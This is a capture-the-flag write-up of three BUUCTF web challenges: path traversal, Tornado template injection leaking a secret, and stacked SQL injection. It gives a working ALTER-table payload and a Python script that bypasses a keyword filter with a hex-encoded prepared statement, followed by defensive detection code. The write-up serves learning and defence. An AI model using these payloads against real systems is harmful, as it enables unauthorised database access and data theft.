BUUCTF platform - web (learning-by-doing record)

1. WarmUp

The idea is straightforward: it is a file inclusion. The vulnerable point is the code that decodes the parameter a second time, so injecting a ?../../ is enough to traverse the path; then include the flag, whose path is given in hint.php.

2. easy_tornado

The challenge gives this information: the flag's path is known, rendering the template should be related to injection, and hint.txt should give the filehash algorithm.

Looking at the URL, we control both the file name and the file hash.

Passing a nonexistent file name jumps to an error page, where the error string is echoed straight back, so try template injection: write 9 and it is returned as well. The guess is that we need to compute the filehash of the flag file, but since the key is unknown we first have to leak it through template injection. The challenge is titled tornado, and the usual template-injection characters such as [] and () are filtered, so look for some Tornado global configuration that can be read.


So handler.settings in Tornado gives access to the "Application Settings", where a site's variables should be stored; the key can therefore be read directly, and the filehash constructed from it.

Then take the secret and compute the md5 hash. Reading the documentation is still useful; don't just google more than you read the docs. Of course the line of thought has to be right, such as guessing here that the secret is stored in the application's global configuration.

3. Note casually

Here first submit 1, which returns the data corresponding to 1; then submit 1', which gives the following:

Submitting 1'or''=' returns normally:

This shows injection definitely exists, but the common keywords are blocked here by a case-insensitive regex filter, so the usual approach of querying the system tables won't work; a stacked injection can be tried instead.

Two tables are obtained, so next we need to check which columns the two tables have: show columns from yields the flag column, and show create table `1919810931114514`; also shows the table structure.
Then:


There are two solutions here:

First: since the backend actually queries the words table, use alter to change table names and columns so that the 1919810931114514 table is renamed to words; a query against words is then really a query against the 1919810931114514 table. A clever trick.

The payload is:

';alter table `1919810931114514` add(id int default 1);alter table words rename xxx;alter table `1919810931114514` rename words;#

Querying again then returns the flag. I guess the backend statement is select * from words where id=1


Second: apart from that trick, the conventional approach I have seen is this:

# coding=utf-8
import requests

# target table: 1919810931114514
part_url = 'http://49.4.66.242:31368/?inject='
# the real query, hex-encoded so the keyword filter never sees it in plain text
payload = "select flag from `1919810931114514`;"
payload = payload.encode().hex()
# stacked statements: store the hex string in @x, then prepare and execute it
payload = "1';Set @x=0x" + payload + ";Prepare a from @x;execute a;%23"
print(payload)
full_url = part_url + payload
r = requests.get(url=full_url)
print(r.content)

The SQL statement is compiled first: the payload is hex-encoded, then run with execute. The hex-encoded payload is recognised during preparation. Learned something new.
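As an added example (not code from the original write-up), the following Python shows, from the defender's side, why a raw keyword blocklist like the one this challenge used misses the prepared-statement payload, and how a log check that decodes 0x literals and flags stacked statements catches both solutions above; the blocklist word list and the sample inputs are assumptions constructed here.

```python
import re

# Constructed approximation of the challenge's check: a case-insensitive keyword
# blocklist applied to the raw inject parameter only (assumed word list).
NAIVE_BLOCKLIST = re.compile(r"select|update|delete|drop|insert|where", re.I)
# Shapes of the two stacked payloads in the write-up: a second statement after ';'
# that sets a user variable, prepares/executes it, or alters a table.
STACKED = re.compile(r";\s*(set\s+@\w+|prepare\s+\w+\s+from|execute\s+\w+|alter\s+table)", re.I)
HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]{2,})")


def naive_filter_blocks(inject):
    """What the challenge did: keyword match on the raw string, so hex literals pass."""
    return bool(NAIVE_BLOCKLIST.search(inject))


def decode_hex_literals(inject):
    """Replace each 0x... literal by its text so SQL hidden inside it becomes visible."""
    def _decode(match):
        raw = match.group(1)
        if len(raw) % 2:
            return match.group(0)
        try:
            return bytes.fromhex(raw).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            return match.group(0)
    return HEX_LITERAL.sub(_decode, inject)


def analyse(inject):
    """Return the findings a log review should raise for one inject parameter value."""
    findings = []
    if STACKED.search(inject):
        findings.append("stacked-query")
    decoded = decode_hex_literals(inject)
    if decoded != inject and NAIVE_BLOCKLIST.search(decoded):
        findings.append("keyword-in-hex-literal")
    elif NAIVE_BLOCKLIST.search(decoded):
        findings.append("keyword")
    return findings


if __name__ == "__main__":
    # Constructed sample: the write-up's prepared-statement payload, with the real
    # query hex-encoded exactly as the script above does.
    hidden = "select flag from `1919810931114514`;".encode().hex()
    sample = "1';Set @x=0x" + hidden + ";Prepare a from @x;execute a;#"
    print("naive filter blocks it:", naive_filter_blocks(sample))  # False
    print("findings:", analyse(sample))  # ['stacked-query', 'keyword-in-hex-literal']
```

The real fix is to stop building the statement from the parameter at all (a parameterised query for the words lookup); the decoding check is only what a log review or WAF rule should do in addition.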



Origin www.cnblogs.com/wfzWebSecuity/p/11240956.html